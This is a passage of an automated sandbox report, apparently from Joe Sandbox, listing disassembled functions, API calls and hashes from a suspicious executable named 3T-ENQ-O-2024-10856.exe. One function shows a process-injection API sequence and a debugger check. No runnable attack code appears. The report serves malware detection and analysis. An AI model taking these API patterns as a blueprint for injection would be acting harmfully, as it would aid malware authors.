                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleTime
                                • String ID:
                                • API String ID: 3397143404-0
                                • Opcode ID: 8446d19e705874daf959f839d5e2ad3ea27e28b6c783542eb17ea7256b4e2226
                                • Instruction ID: 4ef8e24d00851680d1dc04b0db81e73a38c397772ef73bac94f10fba40907e2d
                                • Opcode Fuzzy Hash: 8446d19e705874daf959f839d5e2ad3ea27e28b6c783542eb17ea7256b4e2226
                                • Instruction Fuzzy Hash: 82E08632140214BBD7311B54EC4AFCE7B19AB05774F104110FB267D0E087B266119798
                                Function 00CAC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00CAC45E
                                  • Part of subcall function 00C828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828DE
                                  • Part of subcall function 00C828CA: GetLastError.KERNEL32(00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828F0
                                • _free.LIBCMT ref: 00CAC46F
                                • _free.LIBCMT ref: 00CAC481
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                                • Instruction ID: fccf910d935cefa4499ceea6fc6a8562947f2da2631ca28e710f8d75d71e3b3d
                                • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                                • Instruction Fuzzy Hash: 0FE012B260070296CE64B9796898BB353CC6F09759B15482DF459D7182DF14E940963C
                                Function 00C7058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: CALL
                                • API String ID: 0-4196123274
                                • Opcode ID: 598d401d70c63efa5c113af6944c00cba916222bd7a1561a4705564ed4e99807
                                • Instruction ID: be9cd52ce0aeee860fdc77dc6cb4481c9cb760cbff5ffe8220a57919fd7dc793
                                • Opcode Fuzzy Hash: 598d401d70c63efa5c113af6944c00cba916222bd7a1561a4705564ed4e99807
                                • Instruction Fuzzy Hash: 6B227B70508341CFD728DF24C494A2ABBE1BF85314F25896DF9AA8B3A2D731ED45DB42
                                Function 00C64010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: EA06
                                • API String ID: 4104443479-3962188686
                                • Opcode ID: 98d58cfdc9370bfb5271e0468e20e618eadfed051f973e2548648fbb7387fc82
                                • Instruction ID: 70df505c1e0dd8c2973f6c81c047b65cb9c9944c88d0c8704759cb58f8736bda
                                • Opcode Fuzzy Hash: 98d58cfdc9370bfb5271e0468e20e618eadfed051f973e2548648fbb7387fc82
                                • Instruction Fuzzy Hash: B5418F61A041649BDF399B648CD17BF7FA69F56300F284465EA82DB283CA318EC497A1
                                Function 00C634C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule
                                Strings
                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00CD34AA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                • API String ID: 1029625771-2684727018
                                • Opcode ID: 605713e623fce49af9f3b196040b584e5df05debf1fb529d1e79cb48c3d6ddec
                                • Instruction ID: 041487970ae1e0b0d30087f202f816ff891fec18a040d6bff254e7702362e459
                                • Opcode Fuzzy Hash: 605713e623fce49af9f3b196040b584e5df05debf1fb529d1e79cb48c3d6ddec
                                • Instruction Fuzzy Hash: 89F06871D0024DAE9F11EFB0D8D18FFFB78AE10314F10C526E92692181EB359B09DB21
                                Function 00C835E7 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 00C8367B
                                • __flush.LIBCMT ref: 00C8369B
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __flush__getptd_noexit_memmove
                                • String ID:
                                • API String ID: 3662107617-0
                                • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                • Instruction ID: 399cd4bf05801ef00c2eb07da091e8c8b034df6ddf13183abf3e32edb6036cb2
                                • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                • Instruction Fuzzy Hash: 7241D8B1700686AFDF18AE6DC88056E77A5BF40B58B24953DF815C7340EB70DF418B58
                                Function 00C6BBD9 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                • Instruction ID: 04f87c09789cf399df2a1a0e52a5de7162ef71448fcd2a0d5311848dfc400887
                                • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                • Instruction Fuzzy Hash: CC3184B1600506AFD724DF29C8D1E69F3A8FF883207558229E529CB291DF30EE65DB90
                                Function 00C63682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • IsThemeActive.UXTHEME ref: 00C636E6
                                  • Part of subcall function 00C82025: __lock.LIBCMT ref: 00C8202B
                                  • Part of subcall function 00C632DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C632F6
                                  • Part of subcall function 00C632DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C6330B
                                  • Part of subcall function 00C6374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C6376D
                                  • Part of subcall function 00C6374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00C6377F
                                  • Part of subcall function 00C6374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00D21120,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00D21124,?,?), ref: 00C637EE
                                  • Part of subcall function 00C6374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00C63860
                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C63726
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                • String ID:
                                • API String ID: 924797094-0
                                • Opcode ID: 25642d1d3ea1fa16e539281d71884b0d830cdfa1710dae135576ef538a46825b
                                • Instruction ID: 7dc2935eb9ab5c6bb985bd348ba6a4211a2d48319bd385ce5aad54511a044c98
                                • Opcode Fuzzy Hash: 25642d1d3ea1fa16e539281d71884b0d830cdfa1710dae135576ef538a46825b
                                • Instruction Fuzzy Hash: F4118E719083459BC320EF25DD4591ABBE8FFA4750F00851EF495C73B1DB709A46CBA6
                                Function 00C8F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___lock_fhandle.LIBCMT ref: 00C8F7D9
                                • __close_nolock.LIBCMT ref: 00C8F7F2
                                  • Part of subcall function 00C8886A: __getptd_noexit.LIBCMT ref: 00C8886A
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                • String ID:
                                • API String ID: 1046115767-0
                                • Opcode ID: 7922d8522c8253216c6a928a4d5252d620a5f85fd0ee5b30ea197757ac6ff09b
                                • Instruction ID: 0f2c64cea1a800c818daa43857495433f5a0cfa5cb4da58bd9e913c62b1d305e
                                • Opcode Fuzzy Hash: 7922d8522c8253216c6a928a4d5252d620a5f85fd0ee5b30ea197757ac6ff09b
                                • Instruction Fuzzy Hash: E71102328056108FD711BF6498423597B505F5233CFA50368E4709F2E3DBB49D42E7AD
                                Function 00C8010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C845EC: __FF_MSGBANNER.LIBCMT ref: 00C84603
                                  • Part of subcall function 00C845EC: __NMSG_WRITE.LIBCMT ref: 00C8460A
                                  • Part of subcall function 00C845EC: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,?,?,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8462F
                                • std::exception::exception.LIBCMT ref: 00C8013E
                                • __CxxThrowException@8.LIBCMT ref: 00C80153
                                  • Part of subcall function 00C87495: RaiseException.KERNEL32(?,?,00C6125D,00D16598,?,?,?,00C80158,00C6125D,00D16598,?,00000001), ref: 00C874E6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                • String ID:
                                • API String ID: 3902256705-0
                                • Opcode ID: c7457a9b1b8239cc21e1a9dd592683378d1704d506db8e6feadb5fcc38c4249d
                                • Instruction ID: 7cb7695118b3ec156d16d943d25b9c05b7573eae6a60df75153c9839c5a25b4d
                                • Opcode Fuzzy Hash: c7457a9b1b8239cc21e1a9dd592683378d1704d506db8e6feadb5fcc38c4249d
                                • Instruction Fuzzy Hash: 33F0287510820EA6CB15FBA8EC069DE77EC9F05368F200025F90592092DBB0C784B7AD
                                Function 00C84274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • __lock_file.LIBCMT ref: 00C842B9
                                  • Part of subcall function 00C85A9F: __lock.LIBCMT ref: 00C85AC2
                                • __fclose_nolock.LIBCMT ref: 00C842C4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                • String ID:
                                • API String ID: 2800547568-0
                                • Opcode ID: 6f40f87c2eba8564e9ac8b787874eb6e55565b693b655f5666a1d19a2046f2cf
                                • Instruction ID: 8cf86e761f04be003e5af62d226872c2d0bed510ed5442d446611a1085c5328f
                                • Opcode Fuzzy Hash: 6f40f87c2eba8564e9ac8b787874eb6e55565b693b655f5666a1d19a2046f2cf
                                • Instruction Fuzzy Hash: BAF0B4318097069AD715BB7588027AE77D06F4033CF228319B8349B1C2DB7CDA01BB5D
                                Function 0339129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessW.KERNEL32(?,00000000), ref: 03391A5B
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03391AF1
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03391B13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction ID: c3cee0b08bcf4e65ee0bf8532071ac17b3df4cdc72d724123699ed91da49b262
                                • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction Fuzzy Hash: 8512BF24E14658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                Function 00CDAA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: 89e22c7cc1fd2169c41e2eaba3c24a1b786146ba4c6e805469960d0dc1cb3d5f
                                • Instruction ID: 079697641121dbe2ba66ca9315abc3a7a9e2e53ec817a36c92d2b0c6fd019236
                                • Opcode Fuzzy Hash: 89e22c7cc1fd2169c41e2eaba3c24a1b786146ba4c6e805469960d0dc1cb3d5f
                                • Instruction Fuzzy Hash: 65415E70504651CFDB24CF18C484B1ABBE1BF45318F29859CEAAA5B362C371EC85DF52
                                Function 00C6BD71 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 88ff7b157f03094d068b862d771b67b6020c88fadba00d09022a3216b8d58597
                                • Instruction ID: db7ce3c5edec75f3f28479f3ca676000bc6edcc88b270590ab6fc2736ea6b142
                                • Opcode Fuzzy Hash: 88ff7b157f03094d068b862d771b67b6020c88fadba00d09022a3216b8d58597
                                • Instruction Fuzzy Hash: 9A210871600609FBDB245F21EC81769BBB4FB64350F21C42EE586C5294EF30D5D2D714
                                Function 00C63F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C63F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00C63F90
                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C634E2,?,00000001), ref: 00C63FCD
                                  • Part of subcall function 00C63E78: FreeLibrary.KERNEL32(00000000), ref: 00C63EAB
                                  • Part of subcall function 00C64010: _memmove.LIBCMT ref: 00C6405A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Library$Free$Load_memmove
                                • String ID:
                                • API String ID: 3640140200-0
                                • Opcode ID: 3433850d31e3204d81ed2053658a3ded7bb5bb04249ee39ca147093f25d3d1f6
                                • Instruction ID: 3684cc09aaeec4b8271bbb9951d7f2f1399a39c20f6149286b02027e15c58afc
                                • Opcode Fuzzy Hash: 3433850d31e3204d81ed2053658a3ded7bb5bb04249ee39ca147093f25d3d1f6
                                • Instruction Fuzzy Hash: D611E032600219AACB24BF64DC86B9E77A99F50B00F108829F642EB1C1DF759F05BB60
                                Function 00CDAB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: 7e1854a50e640c46b00e63039bb81e462a4c69ed75394f284bfaa80ccdcdaffa
                                • Instruction ID: fe95fe5794c057466e8bb8be7b37c42621298eb2abcd0aecd3ee339223226454
                                • Opcode Fuzzy Hash: 7e1854a50e640c46b00e63039bb81e462a4c69ed75394f284bfaa80ccdcdaffa
                                • Instruction Fuzzy Hash: 06212770508641CFDB24DF29C444B1ABBE1BF89314F25896CEAAA5B262C331E845DF52
                                Function 00C8BD14 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___lock_fhandle.LIBCMT ref: 00C8BD73
                                  • Part of subcall function 00C8886A: __getptd_noexit.LIBCMT ref: 00C8886A
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __getptd_noexit$___lock_fhandle
                                • String ID:
                                • API String ID: 1144279405-0
                                • Opcode ID: 2b27d1ff3d50c4331b55af42caf99fb9e69595f428d18733fd5f155b6d94ecbb
                                • Instruction ID: d48b77d9ceeab55aa29d46d17c3d58cb135b7f9ae4d3c3b26cfafbbce2aeefdf
                                • Opcode Fuzzy Hash: 2b27d1ff3d50c4331b55af42caf99fb9e69595f428d18733fd5f155b6d94ecbb
                                • Instruction Fuzzy Hash: 0411C132805614AFD722BF64CC463597A606F4133DF990341E4740F2EADBB49D41AB69
                                Function 00C8373E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                • __lock_file.LIBCMT ref: 00C8377D
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __getptd_noexit__lock_file
                                • String ID:
                                • API String ID: 2597487223-0
                                • Opcode ID: c4ad1da57f7910b8705bff1b0c9041f8b758b38dd4adfc235c202aa4a0b385ac
                                • Instruction ID: fc14c8af871a5a7feba12ce86be69bf3626900b09288377b0d717b5bdcf5f249
                                • Opcode Fuzzy Hash: c4ad1da57f7910b8705bff1b0c9041f8b758b38dd4adfc235c202aa4a0b385ac
                                • Instruction Fuzzy Hash: 57F096B1500245EBDF21BF748D067DE7660AF01718F145614F4249A1D1E779CB50FB99
